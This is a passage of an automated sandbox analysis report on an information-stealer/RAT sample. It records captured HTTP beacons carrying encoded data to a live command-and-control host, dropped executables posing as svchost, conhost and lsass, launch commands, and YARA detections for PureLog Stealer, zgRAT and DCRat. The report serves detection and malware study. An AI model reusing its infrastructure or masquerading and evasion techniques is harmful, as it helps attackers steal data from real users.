Data Ascii: XT_XYIQR\XWZT_U[YRY_PZVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.!]<*_$.[28 8#7'X$21=1$->1<+!F/'P,9
Oct 1, 2024 05:58:56.258166075 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:56.385241032 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.6 | 49816 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:56.513072968 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:56.872045994 CEST | 1120 | OUT | Data Raw: 58 56 5f 59 5c 46 54 55 5c 58 57 5a 54 52 55 5c 59 56 59 58 50 5e 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XV_Y\FTU\XWZTRU\YVYXP^VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-3'6;;*:$>^%848 +32W2&71<"(()!F/'P,
Oct 1, 2024 05:58:57.147486925 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:57.287834883 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.6 | 49817 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:57.479830980 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:57.824647903 CEST | 1120 | OUT | Data Raw: 58 51 5a 5c 59 43 54 57 5c 58 57 5a 54 59 55 5a 59 5b 59 5c 50 59 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XQZ\YCTW\XWZTYUZY[Y\PYVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U?6;)5'>5%(- 43>?%1%1"]<<<!F/'P,!
Oct 1, 2024 05:58:58.085063934 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:58.213253975 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.6 | 49818 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:58.345223904 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.6 | 49819 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:58.666356087 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:59.012113094 CEST | 1840 | OUT | Data Raw: 58 50 5f 5b 5c 41 54 5e 5c 58 57 5a 54 52 55 5f 59 51 59 56 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XP_[\AT^\XWZTRU_YQYVPZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:'6;*2'-!2]-#$>8&.W&B:($S()!F/'P,
Oct 1, 2024 05:58:59.297585964 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:59.435758114 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 0e 1d 25 17 24 34 3e 57 21 2c 2d 58 29 59 23 5d 25 37 27 5d 2d 5b 33 18 25 3c 37 14 39 0c 2a 5c 3c 29 2e 11 25 3d 3b 5d 24 31 32 1e 27 26 20 5f 0d 10 21 05 22 16 29 0c 38 39 33 14 29 21 28 0a 31 1e 0d 5b 27 0a 25 0b 28 07 28 1e 30 3f 25 53 27 3f 25 0f 2c 1c 38 12 29 09 02 55 23 01 2d 56 02 1e 21 0f 26 38 26 0d 23 2f 31 1b 27 01 2b 01 21 06 35 1d 3e 10 27 04 33 1a 3a 5c 2a 2d 05 58 3f 05 23 5b 35 5c 31 5e 37 0f 31 1b 27 33 27 5c 20 0d 2d 51 05 34 5a 50
Data Ascii: %$4>W!,-X)Y#]%7']-[3%<79*\<).%=;]$12'& _!")893)!(1['%((0?%S'?%,8)U#-V!&8&#/1'+!5>'3:\*-X?#[5\1^71'3'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.6 | 49820 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:58.793203115 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:59.137186050 CEST | 1120 | OUT | Data Raw: 58 52 5a 59 59 40 54 5e 5c 58 57 5a 54 5e 55 58 59 5b 59 5b 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XRZYY@T^\XWZT^UXY[Y[P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]93S";8):'>*^%X,U7V'+1">P$4>Z(7(!F/'P,=
Oct 1, 2024 05:58:59.448971033 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:59.577435017 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P
Oct 1, 2024 05:58:59.809401035 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.6 | 49821 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:59.811001062 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:59:00.169488907 CEST | 1120 | OUT | Data Raw: 5d 56 5f 55 59 44 51 52 5c 58 57 5a 54 5a 55 5c 59 52 59 5c 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]V_UYDQR\XWZTZU\YRY\P]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9#7W +?="0>-&;X/(0.<P&"2P$$2??(9!F/'P,-
Oct 1, 2024 05:59:00.448160887 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:59:00.586829901 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:59:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


                                                          Target ID:0
                                                          Start time:23:56:53
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Zn0uX5K1ez.exe"
                                                          Imagebase:0xb10000
                                                          File size:8'034'816 bytes
                                                          MD5 hash:58509394A423EDB98B0B1BE7F18551AB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2096226398.0000000000B12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2119459063.0000000004625000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                          Imagebase:0x830000
                                                          File size:2'238'090 bytes
                                                          MD5 hash:A87CB2A1E23600C28C1A8E6A5C6A1C52
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 59%, Virustotal
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\explorer.exe"
                                                          Imagebase:0x140000000
                                                          File size:5'736'960 bytes
                                                          MD5 hash:52AAA8C3FD6B813B713AE05AB9E4829C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 71%, ReversingLabs
                                                          • Detection: 65%, Virustotal
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe"
                                                          Imagebase:0x50000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:23:56:55
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c cls
                                                          Imagebase:0x7ff6d9880000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
                                                          Imagebase:0x1c0000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\blockhostnet\msinto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\blockhostnet/msinto.exe"
                                                          Imagebase:0xa00000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.2352080688.0000000000A02000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
                                                          Imagebase:0x7ff633790000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"
                                                          Imagebase:0x7ff699030000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
                                                          Imagebase:0x7ff633790000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"
                                                          Imagebase:0x7ff699030000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat"
                                                          Imagebase:0x7ff6d9880000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7f2680000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7a2b70000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:23:57:27
                                                          Start date:30/09/2024
                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0x10000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:false

                                                          Target ID:24
                                                          Start time:23:57:31
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                                          Imagebase:0x80000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:23:57:42
                                                          Start date:30/09/2024
                                                          Path:C:\Recovery\lsass.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Recovery\lsass.exe"
                                                          Imagebase:0xe00000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:23:57:53
                                                          Start date:30/09/2024
